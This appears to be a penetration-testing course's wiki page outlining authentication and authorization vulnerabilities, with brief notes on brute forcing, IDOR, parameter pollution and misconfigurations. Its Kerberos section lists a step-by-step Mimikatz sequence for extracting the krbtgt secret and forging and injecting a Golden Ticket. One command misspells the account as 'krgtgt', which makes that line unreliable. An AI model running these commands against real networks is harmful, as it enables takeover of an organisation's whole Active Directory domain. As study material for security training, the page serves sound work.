App Vulnerabilities: Authentication and Authorization - Paiet/SEC-335 GitHub Wiki
- Authentication
- Credential brute forcing
- Default credentials
- Weak credentials
- Session hijacking
- Redirect
- Used along with SE to get target to visit malicious site
- Kerberos exploits
- Golden Ticket
- Allows you to create a ticket that will allow you to access anything in AD
- Ticket valid for 10 years
- Ticket valid even if password is changed for krbtgt account
- Post-Exploit
- Use Mimikatz to perform attack
- From PS$ -
whoami /user
grab SID
privilege::debug
lsadump::lsa /inject /name:krgtgt
kerberos::list
(list available tickets)
kerberos::tgt
(current session ticket)
kerberos::purge
kerberos::golden /domain:pentestplus.com /sid:SID /user:admin /ticket:golden.kirbi
kerberos::ptt golden.kirbi
misc::cmd
(opens cmd using golden ticket)
- Authorization
- Parameter pollution
- aka HTTP Parameter pollution
- The adding of multiple instances of an HTTP parameter in a GET/POST request
- Insecure direct object reference
- User can access and manipulate the value of an object
- DEMO: bWAPP IDOR TICKETS (A4)
- Security misconfigurations
- Using home-grown encryption instead of industry standard
- Not removing irrelevant/outdated/unused content
- Not removing debugging mechanisms once app is in production
- Sensitive data disclosure through app
- unprotected files/folders
- Directory is listable
- Permissions are misconfigured
- Patches/Updates not applied
- Not setting secure values in app, API, and/or other modules
- Client-side processing of sensitive data instead of Server-side
- Not removing default creds
- Cookie manipulation